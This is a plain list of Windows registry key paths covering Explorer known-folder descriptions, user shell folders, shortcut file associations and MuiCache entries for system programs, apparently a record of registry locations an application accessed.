                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\shellex\IconHandler\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\DocObject

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\DocObject

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\BrowseInPlace

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\BrowseInPlace

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.lnk\Content Type

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\CLSID\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\IsShortcut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\AlwaysShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lnk\AlwaysShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NeverShowExt

                    
                        HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-731

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\AccessibilityCpl.dll,-10

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\ie4uinit.exe,-737

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A77F5D77-2E2B-44C3-A6A2-ABA601054A51}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Programs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{A4115719-D62E-491D-AA7C-E74B8BE3B067}\InitFolderHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Start Menu

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\sud.dll,-1

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wucltux.dll,-1

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\ehome\ehres.dll,-100

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\Windows Sidebar\sidebar.exe,-1005

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsAnytimeUpgradeUI.exe,-1

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\DVD Maker\DVDMaker.exe,-61403

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\FXSRESM.dll,-114

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\unregmp2.exe,-4

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\XpsRchVw.exe,-102

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\displayswitch.exe,-320

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Program Files\Common Files\Microsoft Shared\Ink\mip.exe,-291

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mblctr.exe,-1008

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\NetProjW.dll,-501

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mstsc.exe,-4000

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SnippingTool.exe,-15051

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SoundRecorder.exe,-100

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\SNTSearch.dll,-505

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\OobeFldr.dll,-33056

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\Speech\SpeechUX\sapi.cpl,-5555

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\dfrgui.exe,-103

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wdc.dll,-10030

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\rstrui.exe,-100

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\miguiresource.dll,-201

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-591

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\migwiz\wet.dll,-588

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-102

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe,-101

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\comres.dll,-3410

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\mycomput.dll,-300

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\odbcint.dll,-1310

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\miguiresource.dll,-101

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\iscsicpl.dll,-5001

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\MdSched.exe,-4001

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wdc.dll,-10021

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\pmcsnap.dll,-700

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\wsecedit.dll,-718

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\filemgmt.dll,-2204

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msconfig.exe,-126

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\System32\AuthFWGP.dll,-20

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\gameux.dll,-10082

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\ShellEx\IconHandler\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\DocObject

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\PerceivedType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\BrowseInPlace

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.URL\Content Type

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\CLSID\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\IsShortcut

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\AlwaysShowExt

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\InternetShortcut\NeverShowExt

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\sdcpl.dll,-101

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\recdisc.exe,-2000

                    
                        HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\62\52C64B7E\@C:\Windows\system32\msra.exe,-100

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes

                    
